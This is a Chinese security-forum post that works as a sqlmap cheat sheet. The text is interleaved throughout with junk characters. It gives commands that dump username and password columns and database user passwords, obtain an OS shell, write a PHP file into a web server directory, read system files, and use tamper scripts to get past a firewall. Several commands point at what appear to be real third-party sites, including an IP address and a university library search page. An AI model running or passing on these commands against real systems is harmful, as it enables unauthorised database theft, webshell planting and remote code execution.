找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2450|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
  F4 l5 d5 b; Q1 ]7 }6 f0 _& H) G& U0 S# ~, Y4 c* T' n1 Q
update :::::>     in the folder   after  execute    following   order : svn update. Q5 _3 T; U& t
; i* S6 W' U0 i6 t% Y  K) V; I
sqlmap.py -r 1.txt --current-db' {: _' E& \/ n
/ H0 V6 ^' K; U) {' C/ b: n
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”7 n- M$ b4 H1 i5 I$ e
& ?0 h3 B$ @; v& _/ _4 j
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
4 [( \- [# D) M3 }: e猜解数据库3 I! Y' X  p( w( I
./sqlmap.py -u "injection-url" --dbs+ O# v1 N$ \- h& E6 U
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"+ T1 A% a6 ~* o& K9 w+ k. z3 ?; _

- Y% A/ z. v. [. R  f猜解表名- p$ o9 r4 }& F: X& R
./sqlmap.py -u "injection-url" -D database_name --tables
# ]$ u) t8 _; Y$ _
1 t1 _" |. ?# D$ y# u" Psqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
" R- S) {( D  b5 y- g+ F8 |sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 0 }, Z, p" C5 k: R( @: t
& u$ k: a; I) m! R! b
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
7 ]; B1 G. J9 |6 R$ S' x
9 m# ^4 q! e5 s/ G& v% b5 Ysqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py", y5 ^# O( `& j( c2 |9 t7 X
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
7 W+ \8 d2 z/ V" Dsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" . M1 h  u: i* n+ F! h6 v
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py". D2 u8 N: l5 ^' G; ?! g

2 h# n* A# L8 Q2 ~& w, Gsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"/ M9 ~! L$ s: n, m
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"6 |8 O9 B: J) N8 ?1 w3 @  l
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
5 ~, }0 F' {: Ysqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
3 I0 d/ \( }8 C& j& E+ Rsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump9 K3 k- w0 `  e* ]2 {' X
( \( [9 S) @8 P0 z& A
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
: H& N2 o' P& |. m" f4 lsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"+ v2 T$ R) ?5 H: z+ b) J: @& _) E
1 D3 G1 J2 A# e" S' @6 l
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"0 l& \+ v. w/ L1 U0 I
猜解列名. S# e) V! a3 B& p4 A
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns4 L. [: e# y. n, c* U
( _4 ~" s7 @# U5 X2 K- H
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
% c2 G( D3 U" C+ L/ i; `sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 3 X7 q# w. K2 M4 G
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
5 Y$ C: y% C. h, T- `- B4 g9 x  Y1 k1 }- |! [. {
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
7 w8 ~  H' Y& T; g&submit=Go
1 `% H; L7 Z" f6 B; h猜解值
8 T8 r, @# x- w/ F$ I; _3 |./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
( Z, d2 P" x' C7 w========================================================
$ j! L- @1 p  ^+ r搜索表名中包括mana字符的$ {0 i' ^7 h# ]& h% m  Z
/sqlmap.py -u "injection-url" -T mana --search/ F6 p" A% {: m/ V5 L
返回一个交互式sql shell
3 ~. ?$ g" L8 X+ E# c- X1 e/ C/sqlmap.py -u "injection-url" --sql-shell- L1 q& I0 J$ ]+ y* R4 ~
读取指定文件(需权限)8 ]( c. P; o6 Q9 q/ E% |% h* Y, y/ c
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
3 J' R6 x- x* q& U7 d& J: O查看当前 用户 及 数据库 7 P# j" F& g, }0 k. T
/sqlmap.py -u "injection-url" --current-user --current-db
& R4 g$ n* }+ }3 ?本地文件 写入 远程目标绝对路径: `# {9 b( F6 ^+ ~. @
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径( ?: A& h8 y; N
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" + j: k* M5 @) i$ W2 A  c% S: ~

$ Z6 L( M' J7 }# @& H3 Isqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径  V. l$ {4 c/ I9 h$ [" w
查看某用的权限" s" v$ B! H+ p) ]
/sqlmap.py -u "injection-url" --privileges -U root2 E" L4 u) o9 J5 ?/ S
查看当前用户是否为dba% d6 a5 I, o5 c# [2 H% Y+ Q
/sqlmap.py -u "injection-url" --is-dba
- l4 e' B( f- i- X) x8 ]) p读取所有数据库用户或指定数据库用户的密码3 Z+ m8 J& v4 i4 d+ t, w' W7 Z6 d! ^
sqlmap.py -r 1.txt --users --passwords
7 u9 }* H( c1 l$ v2 y4 ysqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
5 m* C/ R  E* q- V+ t+ N
4 j7 U7 N" G# _/sqlmap.py -u "injection-url" --passwords -U root' ]( i& @3 G* K( o
3 @8 C1 }, C+ c5 Z/ M
--start&&--stop 与 --first&&--last 的区别8 ?8 n$ u5 x' a, p8 ?3 U( F4 v8 P
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)0 g& G. u7 w9 N# D% k6 R" C2 G

" N% p- Q; x/ P. U  @. J7 p* }从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)9 U9 L+ B0 J) w: u
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
3 x; s0 D3 j) L4 {/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
5 Y5 y% e4 u0 H" N; p! Z6 B/ T% q% Y! s, J( s
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……): O# n* I; r: L- J* k1 M0 a, @
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
9 Z2 _' L4 X* U6 D6 g  v7 O) y0 U8 y  N) ^  b# ~& e% v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表